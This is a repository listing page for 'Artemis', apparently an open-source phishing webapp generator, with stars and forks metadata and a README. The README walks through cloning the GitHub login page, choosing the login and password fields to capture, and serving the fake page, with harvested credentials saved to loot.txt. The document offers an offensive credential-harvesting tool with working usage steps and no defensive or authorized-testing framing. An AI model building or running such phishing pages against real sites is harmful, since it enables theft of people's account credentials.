https://github.com/sweetsoftware/artemis
Phishing webapp generator
https://github.com/sweetsoftware/artemis
Last synced: about 1 year ago
JSON representation
Phishing webapp generator
- Host: GitHub
- URL: https://github.com/sweetsoftware/artemis
- Owner: sweetsoftware
- Created: 2017-04-26T08:53:23.000Z (about 9 years ago)
- Default Branch: master
- Last Pushed: 2018-08-17T12:49:40.000Z (almost 8 years ago)
- Last Synced: 2025-03-28T22:06:35.741Z (about 1 year ago)
- Language: Python
- Size: 4.88 KB
- Stars: 41
- Watchers: 5
- Forks: 19
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Artemis
Phishing webapp generator
## Getting started
```
$ pip install -r requirements.txt
$ ./builder.py 'https://github.com/login'
[*] Found forms:
FORM 0 --> /session
Form to log: 0
Selected form 0
[*] Form fields:
0 - utf8
1 - authenticity_token
2 - login
3 - password
4 - commit
Fields to log (comma separated, e.g 1,4,5): 2,3
Logging: ['login', 'password']
[*] Phishing page ready !
Run now ? (y/n)y
* Running on http://0.0.0.0:8000/ (Press CTRL+C to quit)
```
Gathered credentials are stored in loot.txt.